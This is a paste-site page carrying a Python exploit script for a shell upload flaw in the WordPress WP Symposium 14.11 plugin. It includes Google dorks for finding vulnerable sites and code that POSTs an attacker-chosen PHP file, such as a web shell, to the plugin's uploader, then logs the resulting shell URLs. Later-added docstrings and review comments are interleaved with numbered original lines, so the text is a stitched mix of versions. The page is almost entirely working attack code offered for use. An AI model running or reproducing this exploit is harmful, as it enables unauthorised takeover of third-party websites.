Googleinurl

[EXPLOIT]Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11

Dec 11th, 2014
  1. #!/usr/bin/python
  2. #-------------------------------------------------------------------------------
  3. # Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
  4. # Vulnerability discovered by Claudio Viviani - http://www.homelab.it
  5. # Exploit written by Claudio Viviani / Edited INURL - BRASIL
  6. # 2014-11-27:  Discovered vulnerability
  7. # 2014-12-01:  Vendor Notification (Twitter)
  8. # 2014-12-02:  Vendor Notification (Web Site)
  9. # 2014-12-04:  Vendor Notification (E-mail)
  10. # 2014-12-11:  No Response/Feedback
  11. # 2014-12-11:  Published
  12. # DORK:  index of "wp-symposium"
  13. # DORK:  inurl:"plugins/wp-symposium" -site:wordpress.org
  14. # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
  15. #-------------------------------------------------------------------------------
  16. import urllib, urllib2, socket
  17. import sys
  18. import string, random
  19. import optparse
  20. import os, os.path, mimetypes
  21. import datetime
  22. import os
  23.  
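def checkurl(url):
    """Return *url* unchanged if it carries an explicit http(s) scheme.

    The check is a plain prefix test: only the spellings ``http://`` and
    ``https://`` are accepted. Anything else prints a message and ends the
    process with exit status 1.

    Args:
        url: target URL as given on the command line (``-t``).

    Returns:
        The same ``url`` string when it starts with ``http://`` or ``https://``.

    Raises:
        SystemExit: via ``sys.exit(1)`` when the scheme prefix is missing.
    """
    # Tuple form of startswith replaces the two hand-written slice compares.
    if not url.startswith(("http://", "https://")):
        # Message text corrected ("procotol" -> "protocol").
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    return url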
  30.  
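def checkfile(file):
    """Return *file* if it names an existing, readable regular file.

    Args:
        file: path given on the command line (``-f``).

    Returns:
        The same path string when both ``os.path.isfile`` and
        ``os.access(..., os.R_OK)`` succeed.

    Raises:
        SystemExit: via ``sys.exit(1)`` when either check fails.
    """
    # The original joined the two negated checks with ``and``, so a path was
    # only rejected when it was BOTH not a regular file AND unreadable; an
    # unreadable regular file or a readable directory passed through.  Either
    # failing condition must reject the path.
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] ' + file + ' file is missing or not readable')
        sys.exit(1)
    return file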
  37. # Get file's mimetype
def get_content_type(filename):
    """Guess a MIME type from the extension of *filename*.

    Falls back to ``application/octet-stream`` when ``mimetypes`` cannot
    classify the name.
    """
    guessed, _encoding = mimetypes.guess_type(filename)
    if not guessed:
        return 'application/octet-stream'
    return guessed
  40.  
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Build a pseudo-random identifier of *size* characters drawn from *chars*.

    Uses ``random.choice`` (the non-cryptographic PRNG), exactly as before.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
  43.  
  44.  
  45. # Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
   """Assemble the multipart/form-data body POSTed to the plugin uploader.

   Three plain form fields (``uploader_uid``, ``uploader_dir``,
   ``uploader_url``) are followed by one file part named ``files[]`` whose
   filename is ``randShellName + ".php"`` and whose content is read verbatim
   from *payloadname*.

   Args:
       payloadname: local path of the file whose bytes become the file part.
       randDirName: directory component sent as ``uploader_dir``.
       randShellName: basename (without extension) used for the file part.

   Returns:
       The body as a single CRLF-joined string.

   Reads the module-level ``url_symposium_upload``, which is assigned later
   in this script; calling this before that assignment raises NameError.
   """

   getfields = dict()
   getfields['uploader_uid'] = '1'
   # The destination directory is supplied by the client; the exploit relies
   # on the server honouring this field as sent.
   getfields['uploader_dir'] = './'+randDirName
   getfields['uploader_url'] = url_symposium_upload

   # Whole file read into memory; the handle is never explicitly closed.
   payloadcontent = open(payloadname).read()

   # Fixed boundary; must match the boundary in the content_type header set
   # at module level.  Being a literal, it is a static signature in traffic.
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   # Field order follows dict iteration order (unordered on Python 2).
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   # File part: name is always 'files[]', filename always ends in ".php".
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
  74.  
banner = """
0x[EXPLOIT NAME]: Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11 / INURL - BRASIL
------------------------------------------------------------------------------------------------------------------
"""

# Command-line interface: -t/--target and -f/--file are required (checked
# below); --timeout is an int defaulting to 10 seconds.
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout

print(banner)

# Applies --timeout to every socket urllib2 opens below.
socket.setdefaulttimeout(timeout)

# Fixed plugin path under the WordPress root; the POST below targets this
# directory's index.php.  Together with the literal boundary and User-Agent
# below, this request path is a static signature for detection.
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'

# Must match the LIMIT string hard-coded in create_body_sh3ll_upl04d.
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

randDirName = id_generator()
randShellName = id_generator()

bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)

# Hard-coded browser User-Agent; header names are lowercase except User-Agent.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
    # Supplying a data argument makes urllib2 issue a POST.
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()

    # Success heuristic: any body that is non-empty, not "0" and does not
    # contain the substring "error" is reported as an upload.
    if "error" in read or read == "0" or read == "":
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print('0x' + str(now) + '[INFO][NOT VULN]: Upload Failed')
    else:
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print('0x' + str(now) + '[INFO][VALUE]: Shell Uploaded')
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print('0x' + str(now) + '[INFO][VALUE]: Location: '+url_symposium_upload+randDirName+randShellName+'.php')
       # Output file in the current working directory; only assigned here.
       file_saved = 'poffOUTPUT_Sh311_Upl04d_Vuln3r4b1l1ty.txt'

       msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
       url_saved = url_symposium_upload+randDirName+randShellName+".php\n"
    # NOTE(review): this block sits at try-body indentation, not inside the
    # else above, so it also runs on the "Upload Failed" path where
    # file_saved, url_saved and msg were never assigned -> NameError, which
    # the except clauses below (HTTPError / URLError only) do not catch.
    if os.path.exists(file_saved):
       arquivo = open(file_saved, 'a')
       arquivo.write(url_saved)
       arquivo.close()
       print(msg)
    else:
       arquivo = open(file_saved, 'w')
       arquivo.write(url_saved)
       arquivo.close()
       print(msg)

except urllib2.HTTPError as e:
    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print('0x' + str(now) + '[INFO][ERROR]: '+str(e))
except urllib2.URLError as e:
    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print('0x' + str(now) + '[INFO][ERROR]: Connection Error: '+str(e))